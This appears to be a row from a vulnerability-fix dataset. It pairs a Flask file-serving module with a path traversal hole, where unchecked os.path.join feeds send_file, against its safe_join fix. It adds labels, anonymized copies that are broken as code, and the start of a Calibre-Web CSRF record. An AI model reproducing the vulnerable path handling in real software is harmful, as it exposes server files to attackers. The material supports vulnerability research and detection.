return class_paths
mixer_list = []
class_paths = get_class_path()
print("Class paths : {}".format(class_paths))
sys.stdout.flush()
if class_paths:
for path in class_paths:
print("Path Exists ? {}".format(os.path.exists(path)))
sys.stdout.flush()
mixer_list.extend(sorted(glob.glob(os.path.join(path, "*.jpg"))))
mixer_list = [_get_obj_path(l.strip()) for l in mixer_list]
else:
with open(mixer_index, 'r') as f:
mixer_list = list(f.readlines())
return mixer_list
@scope_blueprint.route('/id/<path:object_path>')
def get_object_id(object_path):
headers = Headers([('Content-Type', 'text/xml')])
return Response(_get_object_element(object_path=object_path),
"200 OK",
headers=headers)
@scope_blueprint.route('/meta/<path:object_path>')
def get_object_meta(object_path):
path = _get_obj_absolute_path(object_path)
attrs = dict()
try:
attrs['_gt_label'] = path.split('/')[-2]
except IOError:
pass
return jsonify(attrs)
def _get_object_element(object_path):
path = _get_obj_absolute_path(object_path)
class_text = '/'.join(path.split('/')[:-2])+'/classes.txt'
if os.path.isfile(class_text):
return '<object id={} src={} meta={} />' \
.format(quoteattr(url_for('.get_object_id', object_path=object_path)),
quoteattr(_get_object_src_uri(object_path)),
quoteattr(url_for('.get_object_meta', object_path=object_path)))
return '<object id={} src={} />' \
.format(quoteattr(url_for('.get_object_id', object_path=object_path)),
quoteattr(_get_object_src_uri(object_path)))
def _get_object_src_uri(object_path):
if LOCAL_OBJ_URI:
return 'file://' + _get_obj_absolute_path(object_path)
return url_for('.get_object_src_http', obj_path=object_path)
def _get_obj_path(obj_path):
return obj_path.replace(DATAROOT+'/', '')
def _get_obj_absolute_path(obj_path):
return os.path.join(DATAROOT, obj_path)
def _get_index_absolute_path(index):
return os.path.join(INDEXDIR, index)
@scope_blueprint.route('/obj/<path:obj_path>')
def get_object_src_http(obj_path):
path = _get_obj_absolute_path(obj_path)
headers = Headers()
# With add_etags=True, conditional=True
# Flask should be smart enough to do 304 Not Modified
response = send_file(path,
cache_timeout=datetime.timedelta(
days=365).total_seconds(),
add_etags=True,
conditional=True)
response.headers.extend(headers)
return response
| #
# The OpenDiamond Platform for Interactive Search
#
# Copyright (c) 2009-2018 Carnegie Mellon University
# All rights reserved.
#
# This software is distributed under the terms of the Eclipse Public
# License, Version 1.0 which can be found in the file named LICENSE.
# ANY USE, REPRODUCTION OR DISTRIBUTION OF THIS SOFTWARE CONSTITUTES
# RECIPIENT'S ACCEPTANCE OF THIS AGREEMENT
#
from builtins import next
from builtins import range
import os
import datetime
from xml.sax.saxutils import quoteattr
import sys
import logging
import random
import glob
from itertools import cycle
from flask import Blueprint, url_for, Response, stream_with_context, send_file, \
jsonify
from werkzeug.datastructures import Headers
from werkzeug.security import safe_join
BASEURL = 'cocktail'
STYLE = False
LOCAL_OBJ_URI = True # if true, return local file path, otherwise http.
INDEXDIR = DATAROOT = None
ITEMS_PER_ITERATION = int(1e4)
"""
Example cocktail url:
/cocktail/base/FFFFFFFFFFFFFFFF/distrbuted/1of2/ \
mixers/FFFFFFFFFFFFFFFC/keywords/d_42_1.0/classes/gull,cardinal
/cocktail/base/"0"/mixers/FFFFFFFFFFFFFFFC/keywords/d_42_1.0
/cocktail/base/FFFFFFFFFFFFFFFF/keywords/d_42_1.0
"""
def init(config):
global INDEXDIR, DATAROOT # pylint: disable=global-statement
INDEXDIR = config.indexdir
DATAROOT = config.dataroot
scope_blueprint = Blueprint('mixer_store', __name__)
_log = logging.getLogger(__name__)
@scope_blueprint.route('/base/<baseidx>/mixers/<mixeridx>/keywords/<params>')
@scope_blueprint.route('/base/<baseidx>/mixers/<mixeridx>/keywords/<params>/' +
'classes/<classes>')
@scope_blueprint.route('/base/<baseidx>/mixers/<mixeridx>/keywords/<params>/' +
'classes/<classes>/start/<int:start>/limit/<int:limit>')
@scope_blueprint.route('/base/<baseidx>/distrbuted/<int:index>of<int:total>/' +
'mixers/<mixeridx>/keywords/<params>')
@scope_blueprint.route('/base/<baseidx>/distrbuted/<int:index>of<int:total>/' +
'mixers/<mixeridx>/keywords/<params>/classes/<classes>')
def get_mixer_classes(baseidx, mixeridx=None, index=1, total=1, params=None,
classes=None, start=0, limit=-1):
mixer_list = get_mixer_list(mixeridx, classes)
start_idx = int((index-1)*(1.0/total)*len(mixer_list))
end_idx = int(index*(1.0/total)*len(mixer_list))
mixer_list = mixer_list[start_idx:end_idx]
print("Mixer Size {}".format(len(mixer_list)))
sys.stdout.flush()
return get_scope(baseidx, params, mixer_list, start, limit)
@scope_blueprint.route('/base/<baseidx>/keywords/<params>')
@scope_blueprint.route('/base/<baseidx>/keywords/<params>/start/<int:start>/limit/<int:limit>')
def get_scope(baseidx, params=None, mixer_list=None, start=0, limit=-1):
print("Enter Scope")
sys.stdout.flush()
base_list = []
seed, percentage = decode_params(params)
if baseidx != "0":
base_index = _get_index_absolute_path('GIDIDX' + baseidx.upper())
with open(base_index, 'r') as f:
base_list = list(f.readlines())
if limit > 0:
base_list = base_list[start:start+limit]
elif start > 0:
base_list = base_list[start:]
total_entries = len(base_list)
make_cocktail = bool(mixer_list and base_list)
if base_list:
total_entries = len(base_list) #base_entries
else:
total_entries = len(mixer_list)
base_list = mixer_list.copy()
del mixer_list
random.seed(seed)
#random.Random(seed).shuffle(base_list)
total_sample = 0
if make_cocktail:
random.Random(seed).shuffle(mixer_list)
total_sample = int(percentage*total_entries)
total_entries = total_entries + total_sample
# Streaming response:
# http://flask.pocoo.org/docs/0.12/patterns/streaming/
def generate():
yield '<?xml version="1.0" encoding="UTF-8" ?>\n'
if STYLE:
yield '<?xml-stylesheet type="text/xsl" href="/scopelist.xsl" ?>\n'
yield '<objectlist count="{:d}">\n'.format(total_entries)
mix_per_iteration = 0
iteration_count = 0
if make_cocktail:
mix_per_iteration = int(percentage * ITEMS_PER_ITERATION)
pool = cycle(mixer_list)
mix_indices = []
def generate_mix_indices():
random.seed(seed)
return list(map(lambda x: x + ITEMS_PER_ITERATION*iteration_count,
sorted(random.sample(list(range(ITEMS_PER_ITERATION)), mix_per_iteration))))
for count in range(total_entries):
if not count % ITEMS_PER_ITERATION and make_cocktail:
mix_indices = generate_mix_indices()
iteration_count += 1
if count in mix_indices:
obj_path = next(pool).strip()
else:
obj_path = base_list.pop(0).strip()
yield _get_object_element(object_path=obj_path) + '\n'
yield '</objectlist>\n'
headers = Headers([('Content-Type', 'text/xml')])
return Response(stream_with_context(generate()),
status="200 OK",
headers=headers)
def decode_params(params):
keywords = params.split('_')
m_type = keywords[0]
seed = int(keywords[1])
percentage = 0.0001
if m_type == 'r':
seed = None
if len(keywords) > 2:
percentage = float(keywords[2])/100.
return seed, round(percentage, 4)
def get_mixer_list(idx, classes=None):
"""
Return list of file paths present in given classes of mixer set
If class list is None or incorrect then return list of entire mixer set.
Args:
classes (str): Comma seperated classes of interest
idx (str): Index of mixer collection
Returns:
"""
mixer_index = _get_index_absolute_path('GIDIDX' + idx.upper())
classes_list = []
if classes:
classes.replace('%2C', ',')
classes.replace('%20', ' ')
classes_list = classes.split(',')
def get_class_path():
with open(mixer_index, 'r') as f:
dataset_path = f.readline()
dataset_path = '/'.join(dataset_path.split('/')[:-2])
class_paths = []
for c in classes_list:
class_paths.append(_get_obj_absolute_path(dataset_path+'/'+c.strip()))
return class_paths
mixer_list = []
class_paths = get_class_path()
print("Class paths : {}".format(class_paths))
sys.stdout.flush()
if class_paths:
for path in class_paths:
print("Path Exists ? {}".format(os.path.exists(path)))
sys.stdout.flush()
mixer_list.extend(sorted(glob.glob(os.path.join(path, "*.jpg"))))
mixer_list = [_get_obj_path(l.strip()) for l in mixer_list]
else:
with open(mixer_index, 'r') as f:
mixer_list = list(f.readlines())
return mixer_list
@scope_blueprint.route('/id/<path:object_path>')
def get_object_id(object_path):
headers = Headers([('Content-Type', 'text/xml')])
return Response(_get_object_element(object_path=object_path),
"200 OK",
headers=headers)
@scope_blueprint.route('/meta/<path:object_path>')
def get_object_meta(object_path):
path = _get_obj_absolute_path(object_path)
attrs = dict()
try:
attrs['_gt_label'] = path.split('/')[-2]
except IOError:
pass
return jsonify(attrs)
def _get_object_element(object_path):
path = _get_obj_absolute_path(object_path)
class_text = '/'.join(path.split('/')[:-2])+'/classes.txt'
if os.path.isfile(class_text):
return '<object id={} src={} meta={} />' \
.format(quoteattr(url_for('.get_object_id', object_path=object_path)),
quoteattr(_get_object_src_uri(object_path)),
quoteattr(url_for('.get_object_meta', object_path=object_path)))
return '<object id={} src={} />' \
.format(quoteattr(url_for('.get_object_id', object_path=object_path)),
quoteattr(_get_object_src_uri(object_path)))
def _get_object_src_uri(object_path):
if LOCAL_OBJ_URI:
return 'file://' + _get_obj_absolute_path(object_path)
return url_for('.get_object_src_http', obj_path=object_path)
def _get_obj_path(obj_path):
return obj_path.replace(DATAROOT+'/', '')
def _get_obj_absolute_path(obj_path):
return safe_join(DATAROOT, obj_path)
def _get_index_absolute_path(index):
return safe_join(INDEXDIR, index)
@scope_blueprint.route('/obj/<path:obj_path>')
def get_object_src_http(obj_path):
path = _get_obj_absolute_path(obj_path)
headers = Headers()
# With add_etags=True, conditional=True
# Flask should be smart enough to do 304 Not Modified
response = send_file(path,
cache_timeout=datetime.timedelta(
days=365).total_seconds(),
add_etags=True,
conditional=True)
response.headers.extend(headers)
return response
| path_disclosure | {
"code": [
" return os.path.join(DATAROOT, obj_path)",
" return os.path.join(INDEXDIR, index)"
],
"line_no": [
252,
256
]
} | {
"code": [
" return safe_join(DATAROOT, obj_path)"
],
"line_no": [
253
]
} |
from builtins import next
from builtins import range
import os
import datetime
from xml.sax.saxutils import quoteattr
import sys
import logging
import random
import glob
from itertools import cycle
from flask import Blueprint, url_for, Response, stream_with_context, send_file, \
jsonify
from werkzeug.datastructures import Headers
VAR_0 = 'cocktail'
VAR_1 = False
VAR_2 = True # if true, return local file VAR_34, otherwise http.
VAR_3 = VAR_4 = None
VAR_5 = int(1e4)
"""
Example cocktail url:
/cocktail/base/FFFFFFFFFFFFFFFF/distrbuted/1of2/ \
mixers/FFFFFFFFFFFFFFFC/VAR_29/d_42_1.0/VAR_14/gull,cardinal
/cocktail/base/"0"/mixers/FFFFFFFFFFFFFFFC/VAR_29/d_42_1.0
/cocktail/base/FFFFFFFFFFFFFFFF/VAR_29/d_42_1.0
"""
def FUNC_0(VAR_6):
global VAR_3, VAR_4 # pylint: disable=global-statement
VAR_3 = VAR_6.indexdir
VAR_4 = VAR_6.dataroot
VAR_7 = Blueprint('mixer_store', __name__)
VAR_8 = logging.getLogger(__name__)
@VAR_7.route('/base/<VAR_9>/mixers/<VAR_10>/VAR_29/<VAR_13>')
@VAR_7.route('/base/<VAR_9>/mixers/<VAR_10>/VAR_29/<VAR_13>/' +
'classes/<VAR_14>')
@VAR_7.route('/base/<VAR_9>/mixers/<VAR_10>/VAR_29/<VAR_13>/' +
'classes/<VAR_14>/VAR_15/<int:VAR_15>/VAR_16/<int:VAR_16>')
@VAR_7.route('/base/<VAR_9>/distrbuted/<int:VAR_11>of<int:VAR_12>/' +
'mixers/<VAR_10>/VAR_29/<VAR_13>')
@VAR_7.route('/base/<VAR_9>/distrbuted/<int:VAR_11>of<int:VAR_12>/' +
'mixers/<VAR_10>/VAR_29/<VAR_13>/VAR_14/<VAR_14>')
def FUNC_1(VAR_9, VAR_10=None, VAR_11=1, VAR_12=1, VAR_13=None,
VAR_14=None, VAR_15=0, VAR_16=-1):
VAR_17 = FUNC_4(VAR_10, VAR_14)
VAR_21 = int((VAR_11-1)*(1.0/VAR_12)*len(VAR_17))
VAR_22 = int(VAR_11*(1.0/VAR_12)*len(VAR_17))
mixer_list = VAR_17[VAR_21:VAR_22]
print("Mixer Size {}".format(len(VAR_17)))
sys.stdout.flush()
return FUNC_2(VAR_9, VAR_13, VAR_17, VAR_15, VAR_16)
@VAR_7.route('/base/<VAR_9>/VAR_29/<VAR_13>')
@VAR_7.route('/base/<VAR_9>/VAR_29/<VAR_13>/VAR_15/<int:VAR_15>/VAR_16/<int:VAR_16>')
def FUNC_2(VAR_9, VAR_13=None, VAR_17=None, VAR_15=0, VAR_16=-1):
print("Enter Scope")
sys.stdout.flush()
VAR_23 = []
VAR_24, VAR_25 = FUNC_3(VAR_13)
if VAR_9 != "0":
VAR_38 = FUNC_11('GIDIDX' + VAR_9.upper())
with open(VAR_38, 'r') as f:
VAR_23 = list(f.readlines())
if VAR_16 > 0:
VAR_23 = base_list[VAR_15:start+VAR_16]
elif VAR_15 > 0:
VAR_23 = base_list[VAR_15:]
VAR_39 = len(VAR_23)
VAR_26 = bool(VAR_17 and VAR_23)
if VAR_23:
VAR_39 = len(VAR_23) #base_entries
else:
VAR_39 = len(VAR_17)
VAR_23 = VAR_17.copy()
del VAR_17
random.seed(VAR_24)
VAR_27 = 0
if VAR_26:
random.Random(VAR_24).shuffle(VAR_17)
VAR_27 = int(VAR_25*VAR_39)
total_entries = VAR_39 + VAR_27
def FUNC_13():
yield '<?xml version="1.0" encoding="UTF-8" ?>\n'
if VAR_1:
yield '<?xml-stylesheet type="text/xsl" href="/scopelist.xsl" ?>\n'
yield '<objectlist count="{:d}">\n'.format(VAR_39)
VAR_40 = 0
VAR_41 = 0
if VAR_26:
VAR_40 = int(VAR_25 * VAR_5)
VAR_44 = cycle(VAR_17)
VAR_42 = []
def FUNC_15():
random.seed(VAR_24)
return list(map(lambda x: x + VAR_5*VAR_41,
sorted(random.sample(list(range(VAR_5)), VAR_40))))
for count in range(VAR_39):
if not count % VAR_5 and VAR_26:
VAR_42 = FUNC_15()
VAR_41 += 1
if count in VAR_42:
VAR_20 = next(VAR_44).strip()
else:
VAR_20 = VAR_23.pop(0).strip()
yield FUNC_7(VAR_19=VAR_20) + '\n'
yield '</objectlist>\n'
VAR_28 = Headers([('Content-Type', 'text/xml')])
return Response(stream_with_context(FUNC_13()),
status="200 OK",
VAR_28=headers)
def FUNC_3(VAR_13):
VAR_29 = VAR_13.split('_')
VAR_30 = VAR_29[0]
VAR_24 = int(VAR_29[1])
VAR_25 = 0.0001
if VAR_30 == 'r':
VAR_24 = None
if len(VAR_29) > 2:
VAR_25 = float(VAR_29[2])/100.
return VAR_24, round(VAR_25, 4)
def FUNC_4(VAR_18, VAR_14=None):
VAR_31 = FUNC_11('GIDIDX' + VAR_18.upper())
VAR_32 = []
if VAR_14:
classes.replace('%2C', ',')
VAR_14.replace('%20', ' ')
VAR_32 = VAR_14.split(',')
def FUNC_14():
with open(VAR_31, 'r') as f:
VAR_43 = f.readline()
VAR_43 = '/'.join(VAR_43.split('/')[:-2])
VAR_33 = []
for c in VAR_32:
VAR_33.append(FUNC_10(VAR_43+'/'+c.strip()))
return VAR_33
VAR_17 = []
VAR_33 = FUNC_14()
print("Class paths : {}".format(VAR_33))
sys.stdout.flush()
if VAR_33:
for VAR_34 in VAR_33:
print("Path Exists ? {}".format(os.path.exists(VAR_34)))
sys.stdout.flush()
VAR_17.extend(sorted(glob.glob(os.path.join(VAR_34, "*.jpg"))))
VAR_17 = [FUNC_9(l.strip()) for l in VAR_17]
else:
with open(VAR_31, 'r') as f:
VAR_17 = list(f.readlines())
return VAR_17
@VAR_7.route('/id/<VAR_34:VAR_19>')
def FUNC_5(VAR_19):
VAR_28 = Headers([('Content-Type', 'text/xml')])
return Response(FUNC_7(VAR_19=object_path),
"200 OK",
VAR_28=headers)
@VAR_7.route('/meta/<VAR_34:VAR_19>')
def FUNC_6(VAR_19):
VAR_34 = FUNC_10(VAR_19)
VAR_35 = dict()
try:
VAR_35['_gt_label'] = VAR_34.split('/')[-2]
except IOError:
pass
return jsonify(VAR_35)
def FUNC_7(VAR_19):
VAR_34 = FUNC_10(VAR_19)
VAR_36 = '/'.join(VAR_34.split('/')[:-2])+'/VAR_14.txt'
if os.path.isfile(VAR_36):
return '<object id={} src={} meta={} />' \
.format(quoteattr(url_for('.get_object_id', VAR_19=object_path)),
quoteattr(FUNC_8(VAR_19)),
quoteattr(url_for('.get_object_meta', VAR_19=object_path)))
return '<object id={} src={} />' \
.format(quoteattr(url_for('.get_object_id', VAR_19=object_path)),
quoteattr(FUNC_8(VAR_19)))
def FUNC_8(VAR_19):
if VAR_2:
return 'file://' + FUNC_10(VAR_19)
return url_for('.get_object_src_http', VAR_20=VAR_19)
def FUNC_9(VAR_20):
return VAR_20.replace(VAR_4+'/', '')
def FUNC_10(VAR_20):
return os.path.join(VAR_4, VAR_20)
def FUNC_11(VAR_11):
return os.path.join(VAR_3, VAR_11)
@VAR_7.route('/obj/<VAR_34:VAR_20>')
def FUNC_12(VAR_20):
VAR_34 = FUNC_10(VAR_20)
VAR_28 = Headers()
VAR_37 = send_file(VAR_34,
cache_timeout=datetime.timedelta(
days=365).total_seconds(),
add_etags=True,
conditional=True)
VAR_37.headers.extend(VAR_28)
return VAR_37
|
from builtins import next
from builtins import range
import os
import datetime
from xml.sax.saxutils import quoteattr
import sys
import logging
import random
import glob
from itertools import cycle
from flask import Blueprint, url_for, Response, stream_with_context, send_file, \
jsonify
from werkzeug.datastructures import Headers
from werkzeug.security import safe_join
VAR_0 = 'cocktail'
VAR_1 = False
VAR_2 = True # if true, return local file VAR_34, otherwise http.
VAR_3 = VAR_4 = None
VAR_5 = int(1e4)
"""
Example cocktail url:
/cocktail/base/FFFFFFFFFFFFFFFF/distrbuted/1of2/ \
mixers/FFFFFFFFFFFFFFFC/VAR_29/d_42_1.0/VAR_14/gull,cardinal
/cocktail/base/"0"/mixers/FFFFFFFFFFFFFFFC/VAR_29/d_42_1.0
/cocktail/base/FFFFFFFFFFFFFFFF/VAR_29/d_42_1.0
"""
def FUNC_0(VAR_6):
global VAR_3, VAR_4 # pylint: disable=global-statement
VAR_3 = VAR_6.indexdir
VAR_4 = VAR_6.dataroot
VAR_7 = Blueprint('mixer_store', __name__)
VAR_8 = logging.getLogger(__name__)
@VAR_7.route('/base/<VAR_9>/mixers/<VAR_10>/VAR_29/<VAR_13>')
@VAR_7.route('/base/<VAR_9>/mixers/<VAR_10>/VAR_29/<VAR_13>/' +
'classes/<VAR_14>')
@VAR_7.route('/base/<VAR_9>/mixers/<VAR_10>/VAR_29/<VAR_13>/' +
'classes/<VAR_14>/VAR_15/<int:VAR_15>/VAR_16/<int:VAR_16>')
@VAR_7.route('/base/<VAR_9>/distrbuted/<int:VAR_11>of<int:VAR_12>/' +
'mixers/<VAR_10>/VAR_29/<VAR_13>')
@VAR_7.route('/base/<VAR_9>/distrbuted/<int:VAR_11>of<int:VAR_12>/' +
'mixers/<VAR_10>/VAR_29/<VAR_13>/VAR_14/<VAR_14>')
def FUNC_1(VAR_9, VAR_10=None, VAR_11=1, VAR_12=1, VAR_13=None,
VAR_14=None, VAR_15=0, VAR_16=-1):
VAR_17 = FUNC_4(VAR_10, VAR_14)
VAR_21 = int((VAR_11-1)*(1.0/VAR_12)*len(VAR_17))
VAR_22 = int(VAR_11*(1.0/VAR_12)*len(VAR_17))
mixer_list = VAR_17[VAR_21:VAR_22]
print("Mixer Size {}".format(len(VAR_17)))
sys.stdout.flush()
return FUNC_2(VAR_9, VAR_13, VAR_17, VAR_15, VAR_16)
@VAR_7.route('/base/<VAR_9>/VAR_29/<VAR_13>')
@VAR_7.route('/base/<VAR_9>/VAR_29/<VAR_13>/VAR_15/<int:VAR_15>/VAR_16/<int:VAR_16>')
def FUNC_2(VAR_9, VAR_13=None, VAR_17=None, VAR_15=0, VAR_16=-1):
print("Enter Scope")
sys.stdout.flush()
VAR_23 = []
VAR_24, VAR_25 = FUNC_3(VAR_13)
if VAR_9 != "0":
VAR_38 = FUNC_11('GIDIDX' + VAR_9.upper())
with open(VAR_38, 'r') as f:
VAR_23 = list(f.readlines())
if VAR_16 > 0:
VAR_23 = base_list[VAR_15:start+VAR_16]
elif VAR_15 > 0:
VAR_23 = base_list[VAR_15:]
VAR_39 = len(VAR_23)
VAR_26 = bool(VAR_17 and VAR_23)
if VAR_23:
VAR_39 = len(VAR_23) #base_entries
else:
VAR_39 = len(VAR_17)
VAR_23 = VAR_17.copy()
del VAR_17
random.seed(VAR_24)
VAR_27 = 0
if VAR_26:
random.Random(VAR_24).shuffle(VAR_17)
VAR_27 = int(VAR_25*VAR_39)
total_entries = VAR_39 + VAR_27
def FUNC_13():
yield '<?xml version="1.0" encoding="UTF-8" ?>\n'
if VAR_1:
yield '<?xml-stylesheet type="text/xsl" href="/scopelist.xsl" ?>\n'
yield '<objectlist count="{:d}">\n'.format(VAR_39)
VAR_40 = 0
VAR_41 = 0
if VAR_26:
VAR_40 = int(VAR_25 * VAR_5)
VAR_44 = cycle(VAR_17)
VAR_42 = []
def FUNC_15():
random.seed(VAR_24)
return list(map(lambda x: x + VAR_5*VAR_41,
sorted(random.sample(list(range(VAR_5)), VAR_40))))
for count in range(VAR_39):
if not count % VAR_5 and VAR_26:
VAR_42 = FUNC_15()
VAR_41 += 1
if count in VAR_42:
VAR_20 = next(VAR_44).strip()
else:
VAR_20 = VAR_23.pop(0).strip()
yield FUNC_7(VAR_19=VAR_20) + '\n'
yield '</objectlist>\n'
VAR_28 = Headers([('Content-Type', 'text/xml')])
return Response(stream_with_context(FUNC_13()),
status="200 OK",
VAR_28=headers)
def FUNC_3(VAR_13):
VAR_29 = VAR_13.split('_')
VAR_30 = VAR_29[0]
VAR_24 = int(VAR_29[1])
VAR_25 = 0.0001
if VAR_30 == 'r':
VAR_24 = None
if len(VAR_29) > 2:
VAR_25 = float(VAR_29[2])/100.
return VAR_24, round(VAR_25, 4)
def FUNC_4(VAR_18, VAR_14=None):
VAR_31 = FUNC_11('GIDIDX' + VAR_18.upper())
VAR_32 = []
if VAR_14:
classes.replace('%2C', ',')
VAR_14.replace('%20', ' ')
VAR_32 = VAR_14.split(',')
def FUNC_14():
with open(VAR_31, 'r') as f:
VAR_43 = f.readline()
VAR_43 = '/'.join(VAR_43.split('/')[:-2])
VAR_33 = []
for c in VAR_32:
VAR_33.append(FUNC_10(VAR_43+'/'+c.strip()))
return VAR_33
VAR_17 = []
VAR_33 = FUNC_14()
print("Class paths : {}".format(VAR_33))
sys.stdout.flush()
if VAR_33:
for VAR_34 in VAR_33:
print("Path Exists ? {}".format(os.path.exists(VAR_34)))
sys.stdout.flush()
VAR_17.extend(sorted(glob.glob(os.path.join(VAR_34, "*.jpg"))))
VAR_17 = [FUNC_9(l.strip()) for l in VAR_17]
else:
with open(VAR_31, 'r') as f:
VAR_17 = list(f.readlines())
return VAR_17
@VAR_7.route('/id/<VAR_34:VAR_19>')
def FUNC_5(VAR_19):
VAR_28 = Headers([('Content-Type', 'text/xml')])
return Response(FUNC_7(VAR_19=object_path),
"200 OK",
VAR_28=headers)
@VAR_7.route('/meta/<VAR_34:VAR_19>')
def FUNC_6(VAR_19):
VAR_34 = FUNC_10(VAR_19)
VAR_35 = dict()
try:
VAR_35['_gt_label'] = VAR_34.split('/')[-2]
except IOError:
pass
return jsonify(VAR_35)
def FUNC_7(VAR_19):
VAR_34 = FUNC_10(VAR_19)
VAR_36 = '/'.join(VAR_34.split('/')[:-2])+'/VAR_14.txt'
if os.path.isfile(VAR_36):
return '<object id={} src={} meta={} />' \
.format(quoteattr(url_for('.get_object_id', VAR_19=object_path)),
quoteattr(FUNC_8(VAR_19)),
quoteattr(url_for('.get_object_meta', VAR_19=object_path)))
return '<object id={} src={} />' \
.format(quoteattr(url_for('.get_object_id', VAR_19=object_path)),
quoteattr(FUNC_8(VAR_19)))
def FUNC_8(VAR_19):
if VAR_2:
return 'file://' + FUNC_10(VAR_19)
return url_for('.get_object_src_http', VAR_20=VAR_19)
def FUNC_9(VAR_20):
return VAR_20.replace(VAR_4+'/', '')
def FUNC_10(VAR_20):
return safe_join(VAR_4, VAR_20)
def FUNC_11(VAR_11):
return safe_join(VAR_3, VAR_11)
@VAR_7.route('/obj/<VAR_34:VAR_20>')
def FUNC_12(VAR_20):
VAR_34 = FUNC_10(VAR_20)
VAR_28 = Headers()
VAR_37 = send_file(VAR_34,
cache_timeout=datetime.timedelta(
days=365).total_seconds(),
add_etags=True,
conditional=True)
VAR_37.headers.extend(VAR_28)
return VAR_37
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
19,
27,
33,
41,
42,
47,
48,
50,
52,
64,
71,
73,
90,
91,
93,
100,
102,
103,
109,
110,
111,
113,
117,
119,
125,
127,
132,
137,
143,
145,
147,
151,
162,
167,
171,
180,
189,
194,
199,
205,
207,
214,
215,
220,
225,
227,
228,
240,
241,
245,
247,
250,
253,
254,
257,
258,
262,
264,
265,
273,
164,
165,
166,
167,
168,
169,
170,
171,
172,
173
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
19,
28,
34,
42,
43,
48,
49,
51,
53,
65,
72,
74,
91,
92,
94,
101,
103,
104,
110,
111,
112,
114,
118,
120,
126,
128,
133,
138,
144,
146,
148,
152,
163,
168,
172,
181,
190,
195,
200,
206,
208,
215,
216,
221,
226,
228,
229,
241,
242,
246,
248,
251,
254,
255,
258,
259,
263,
265,
266,
274,
165,
166,
167,
168,
169,
170,
171,
172,
173,
174
] |
3CWE-352
| # -*- coding: utf-8 -*-
# This file is part of the Calibre-Web (https://github.com/janeczku/calibre-web)
# Copyright (C) 2018-2019 OzzieIsaacs, cervinko, jkrehm, bodybybuddha, ok11,
# andy29485, idalin, Kyosfonica, wuqi, Kennyl, lemmsh,
# falgh1, grunjol, csitko, ytils, xybydy, trasba, vrabe,
# ruben-herold, marblepebble, JackED42, SiphonSquirrel,
# apetresc, nanu-c, mutschler, GammaC0de, vuolter
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import re
import base64
import json
import time
import operator
from datetime import datetime, timedelta
from babel import Locale as LC
from babel.dates import format_datetime
from flask import Blueprint, flash, redirect, url_for, abort, request, make_response, send_from_directory, g, Response
from flask_login import login_required, current_user, logout_user, confirm_login
from flask_babel import gettext as _
from flask import session as flask_session
from sqlalchemy import and_
from sqlalchemy.orm.attributes import flag_modified
from sqlalchemy.exc import IntegrityError, OperationalError, InvalidRequestError
from sqlalchemy.sql.expression import func, or_, text
from . import constants, logger, helper, services
from . import db, calibre_db, ub, web_server, get_locale, config, updater_thread, babel, gdriveutils, kobo_sync_status
from .helper import check_valid_domain, send_test_mail, reset_password, generate_password_hash, check_email, \
valid_email, check_username
from .gdriveutils import is_gdrive_ready, gdrive_support
from .render_template import render_title_template, get_sidebar_config
from . import debug_info, _BABEL_TRANSLATIONS
try:
from functools import wraps
except ImportError:
pass # We're not using Python 3
log = logger.create()
feature_support = {
'ldap': bool(services.ldap),
'goodreads': bool(services.goodreads_support),
'kobo': bool(services.kobo),
'updater': constants.UPDATER_AVAILABLE,
'gmail': bool(services.gmail)
}
try:
import rarfile # pylint: disable=unused-import
feature_support['rar'] = True
except (ImportError, SyntaxError):
feature_support['rar'] = False
try:
from .oauth_bb import oauth_check, oauthblueprints
feature_support['oauth'] = True
except ImportError as err:
log.debug('Cannot import Flask-Dance, login with Oauth will not work: %s', err)
feature_support['oauth'] = False
oauthblueprints = []
oauth_check = {}
feature_support['gdrive'] = gdrive_support
admi = Blueprint('admin', __name__)
def admin_required(f):
"""
Checks if current_user.role == 1
"""
@wraps(f)
def inner(*args, **kwargs):
if current_user.role_admin():
return f(*args, **kwargs)
abort(403)
return inner
@admi.before_app_request
def before_request():
# make remember me function work
if current_user.is_authenticated:
confirm_login()
if not ub.check_user_session(current_user.id, flask_session.get('_id')) and 'opds' not in request.path:
logout_user()
g.constants = constants
g.user = current_user
g.allow_registration = config.config_public_reg
g.allow_anonymous = config.config_anonbrowse
g.allow_upload = config.config_uploading
g.current_theme = config.config_theme
g.config_authors_max = config.config_authors_max
g.shelves_access = ub.session.query(ub.Shelf).filter(
or_(ub.Shelf.is_public == 1, ub.Shelf.user_id == current_user.id)).order_by(ub.Shelf.name).all()
if '/static/' not in request.path and not config.db_configured and \
request.endpoint not in ('admin.ajax_db_config',
'admin.simulatedbchange',
'admin.db_configuration',
'web.login',
'web.logout',
'admin.load_dialogtexts',
'admin.ajax_pathchooser'):
return redirect(url_for('admin.db_configuration'))
@admi.route("/admin")
@login_required
def admin_forbidden():
abort(403)
@admi.route("/shutdown")
@login_required
@admin_required
def shutdown():
task = int(request.args.get("parameter").strip())
showtext = {}
if task in (0, 1): # valid commandos received
# close all database connections
calibre_db.dispose()
ub.dispose()
if task == 0:
showtext['text'] = _(u'Server restarted, please reload page')
else:
showtext['text'] = _(u'Performing shutdown of server, please close window')
# stop gevent/tornado server
web_server.stop(task == 0)
return json.dumps(showtext)
if task == 2:
log.warning("reconnecting to calibre database")
calibre_db.reconnect_db(config, ub.app_DB_path)
showtext['text'] = _(u'Reconnect successful')
return json.dumps(showtext)
showtext['text'] = _(u'Unknown command')
return json.dumps(showtext), 400
@admi.route("/admin/view")
@login_required
@admin_required
def admin():
version = updater_thread.get_current_version_info()
if version is False:
commit = _(u'Unknown')
else:
if 'datetime' in version:
commit = version['datetime']
tz = timedelta(seconds=time.timezone if (time.localtime().tm_isdst == 0) else time.altzone)
form_date = datetime.strptime(commit[:19], "%Y-%m-%dT%H:%M:%S")
if len(commit) > 19: # check if string has timezone
if commit[19] == '+':
form_date -= timedelta(hours=int(commit[20:22]), minutes=int(commit[23:]))
elif commit[19] == '-':
form_date += timedelta(hours=int(commit[20:22]), minutes=int(commit[23:]))
commit = format_datetime(form_date - tz, format='short', locale=get_locale())
else:
commit = version['version']
